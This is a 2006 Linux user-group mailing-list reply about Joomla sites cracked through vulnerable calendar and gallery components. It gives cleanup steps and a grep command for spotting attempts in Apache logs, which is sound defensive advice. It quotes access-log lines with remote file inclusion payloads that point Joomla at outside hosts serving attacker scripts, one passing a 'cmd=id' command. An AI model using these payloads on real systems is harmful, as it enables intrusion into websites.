Re: PLUG website down

Top Page
Attachments:
Message as email
+ (text/plain)
+ (text/html)
+ (text/plain)
Delete this message
Reply to this message
Author: JD Austin
Date:  
To: plug-discuss
Subject: Re: PLUG website down
wrote:
> I have been alerted to the fact that the PLUG site is down. Cracked is
> more likely. There have been a rash of security problems with Joomla!
> addins. I thought I patched the calendar but maybe the early fix was not
> good enough.
>
> I have recent backups so I'll have it back as soon as I can. The current
> calendar component will be going away, however. I'll install a new one.
>
> Alan
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list -
> To subscribe, unsubscribe, or to change you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>

If you're not on version 1.0.10 upgrade now:
http://www.joomla.org/content/view/1510/74/
I wouldn't be surprised if they make major changes in Joomla to stomp
out this type of thing.

In all cases I've had an issue the database was unaffected, only the files.
After the initial panic that I might have been rooted I was relieved
when I found out how they whacked the index.php and configuration.php
files on a few of my inactive sites.

After you restore the site, remove com_extcalendar and com_galeria if
they're still installed.
Check the directory structure to make sure they're gone.
Also check your temp directory for strangeness.. like a '.a' directory.

If you check your logs you'll find stuff like this:

    XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"



I regularly check to see what they're trying to circumvent now by
grepping for this type of vulnerability in the apache access logs:
/bin/grep mosConfig_absolute_path=http
/home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack
attempts'
The location of your apache logs may be different. If you don't have
root you can download the logs for your domain and grep them locally.

JD

--
JD Austin
Twin Geckos Technology Services LLC
email:
http://www.twingeckos.com
phone/fax: 480.288.8195

---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss